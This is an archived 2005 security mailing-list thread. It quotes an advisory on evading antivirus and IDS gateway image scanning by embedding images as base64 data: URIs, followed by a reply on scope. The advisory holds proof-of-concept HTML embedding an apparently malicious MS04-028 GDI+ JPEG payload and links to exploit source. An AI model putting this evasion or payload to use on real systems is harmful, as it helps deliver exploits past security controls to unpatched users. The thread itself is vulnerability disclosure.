[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <325D43D2-640B-11D9-8CCD-000A95820F5E@intrusense.com>
Date: Tue, 11 Jan 2005 14:58:43 -0500
From: Darren Bounds <lists@...rusense.com>
To: Danny <nocmonkey@...il.com>
Cc: full-disclosure@...ts.netsys.com, bugtraq@...urityfocus.com
Subject: Re: [Full-Disclosure] Multi-vendor AV gateway image inspection bypass vulnerability
Hello Danny,
This vulnerability is only applicable to the HTTP data while in
transit. Once received by the client the image will be rendered and
subsequently detected if local AV software.
At the present time, I'm not aware of any AV, IDS or IPS vendor that
will detect malicious images imbedded in HTML in this manner.
Thank you,
Darren Bounds
Intrusense, LLC.
--
Intrusense - Securing Business As Usual
On Jan 11, 2005, at 2:14 PM, Danny wrote:
> On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds
> <dbounds@...rusense.com> wrote:
>> -----BEGIN PGP SIGNED MESSAGE-----
>> Hash: SHA1
>>
>> Multi-vendor AV gateway image inspection bypass vulnerability
>> January 10, 2005
>>
>> A vulnerability has been discovered which allows a remote attacker to
>> bypass anti-virus
>> (as well other security technologies such as IDS and IPS) inspection
>> of
>> HTTP image content.
>>
>> By leveraging techniques described in RFC 2397 for base64 encoding
>> image content within
>> the URL scheme. A remote attack may encode a malicious image within
>> the
>> body of an HTML
>> formatted document to circumvent content inspection.
>>
>> For example:
>>
>> http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
>>
>> The source code at the URL above will by default create a JPEG image
>> that will attempt (and fail
>> without tweaking) to exploit the Microsoft MS04-028 GDI+
>> vulnerability.
>> The image itself is detected
>> by all AV gateway engines tested (Trend, Sophos and McAfee), however,
>> when the same image
>> is base64 encoded using the technique described in RFC 2397
>> (documented
>> below), inspection
>> is not performed and is delivered rendered by the client.
>>
>> While Microsoft Internet Explorer does not support the RFC 2397 URL
>> scheme; Firefox, Safari,
>> Mozilla and Opera do and will render the data and thus successfully
>> execute the payload if the necessary
>> OS and/or application patches have not been applied.
>>
>> ## BEGIN HTML ##
>>
>> <html>
>> <body>
>> <img
>> src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
>> gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw
>> /
>> X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
>> B
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
>> FB
>> QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/
>> bAEMACAYGBwYFCAcHBwkJ
>> CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
>> /b
>> AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
>> Iy
>> MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/
>> xAAfAAABBQEBAQEBAQAAAAAAAAAA
>> AQIDBAUGBwgJCgv/
>> xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
>> oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
>> Rl
>> ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc
>> bH
>> yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/
>> xAAfAQADAQEBAQEBAQEBAAAAAAAA
>> AQIDBAUGBwgJCgv/
>> xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
>> QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm
>> Nk
>> ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8
>> TF
>> xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/
>> APn+iiigD//
>> Z">
>> </body>
>> </html>
>>
>> ## END HTML ##
>>
>> Solution:
>>
>> While AV vendor patches are not yet available, fixes for all currently
>> known image vulnerabilities are
>> and have been for several months. If you have not yet applied them,
>> you have your own
>> negligence to blame.
>>
>> Contributions:
>>
>> Thanks to Scott Roeder and Jacinto Rodriquez their assistance in
>> platform testing.
>
> I believe TrendMicro's OfficeScan (client-server scanner) will catch
> it, but I am not sure about their gateway device. What was their
> response?
>
> ...D
Powered by blists - more mailing lists